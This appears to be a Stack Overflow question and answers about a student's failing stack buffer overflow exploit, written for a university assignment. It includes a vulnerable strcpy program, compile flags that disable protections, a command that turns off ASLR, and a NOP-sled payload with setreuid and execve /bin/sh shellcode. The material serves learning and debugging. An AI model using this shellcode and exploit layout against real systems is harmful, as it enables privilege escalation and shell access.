4

I'm trying to do a Buffer Overflow attack on a simple C program that takes a buffer and print it. I've tried many combinations but at the end, when I try to execute my shellcode, I always get Segmentation Fault.

I've mainly followed this tutorial :

How to exploit a buffer overflow vulnerability - Practical

with the difference that I've tried compiling the program also in m64 because when I did it in m32 my memory addresses were all different, I've tried to explain my steps but if they are not clear you can just watch the video cause I've followed the same procedure.

The code I'm using to try my attack is 

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]){
    char buf[256];
    strcpy(buf, argv[1]);
    printf("%s\n", buf);
    return 0;
}

I compile the code in this way : 

gcc -o example -fno-stack-protector -m64 -z execstack example.c

I've also tried compiling it with m32 but as I said before, but my results after disassembling the main with gdb were completely different from the tutorial, on the other hand, when I compiled it with m64 they were very similar so it was easier to follow.

Once I compiled it and opened gdb I disassemble the main of the program and I look for the strcpy call. I select one of the addresses right after the strcpy call and I make a breakpoint right in that address.

After this I run the python code

run $(python -c "print('A'*256)")

And then I examine the content of the program after I ran this command, which prints 256 As. I examine it with the command

x/200xb $esp

I now can see the exact address in memory where my 'AAA..' sequence starts, I write it in a paper and then I run again my python code to understand with which value it goes in Segmentation Fault state.

Once I find the Seg Fault condition I simply run this : 

run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88
\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd
\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xcf\xff\xff')")

where :

  • 222 is simply the number of \x90 I need to arrive at Segmentation Fault minus the size of my shellcode (which is 46 byte)
  • and the last '\x94\xcf\xff\xff' is the address I wrote before in a paper when I examined the 'AAAA' sequence in memory and looked where it started, of course when I compile the program with m64 this address is longer

at this point, when I run the command the shellcode should be executed but it doesn't happen, it always says Segmentation Fault.

Of course I've also disabled aslr with the command 

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Sorry if I've been messy with my explanation, I've tried like all the different possibilities but I never get the right result. (changing of course some flags, m64, m32 and playing a little bit with the values of the last command).

Thanks in advance, I really hope you'll help me because I need to figure this out for a University Assignemnt

Giorgia
  • 41
  • 2
  • 4
    You are already running your code under a debugger: ***use it!*** Set a breakpoint where the `ret` instruction is and check the stack to see if the return value that you crafted is correct and correctly points to your shellcode. You can single-step with `ni` to see what's going on and use `disassemble` to show the next instruction that is going to be executed. If `disassemble` doesn't work, use something like `x /10i $rip` (or `$eip` for 32bit code). Even with ASLR disabled the stack still can change address (a lot less, but still), jump forward in your NOPs, not right at the beginning. – Marco Bonelli May 12 '20 at 22:37

2 Answers2

0

I think that your mistake is at the return address:

run $(python -c "print('\x90'*222 + '\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68' + '\x94\xfc\xff\xbf')")

Instead of 0xffffcf94 (at m32) use 0xbffffc94.

Maybe that's the mistake because the video you watched is really old and many things have changed until today

To test it, set a breakpoint at the return instruction in the main function and type info registers to gdb to see what is the value of esp (stack pointer)

If that is not the case, then maybe your shellcode is to old for ubuntu 20.04 or you use a x64 shellcode in a x86 executable

Try adding a \xcc at the beginning of your shellcode to test if your shellcode is broken and that causes the SIGSEGV signal

I also tried to develop a POC myself, and here it is:

image

run $(python -c 'print "\x90"*255 + "\xcc" + "aaaabbbbcccc" + "\x68\xfb\xff\xbf"')

where \x90 * 255 are 255 nop instructions to make sure that we will land on the trap \xcc. aaaabbbbcccc is some junk that I used to reach the eip and 0xbffffb68 is a return address to the stack.

ZZZDamon
  • 34
  • 8
-2

You need add "ret" gadget before the jump addr

Bryton
  • 41
  • 5
  • I think the other answers are more meaningful and this answer doesn't make sense in the context of the question. – Ubercoder Aug 09 '21 at 09:45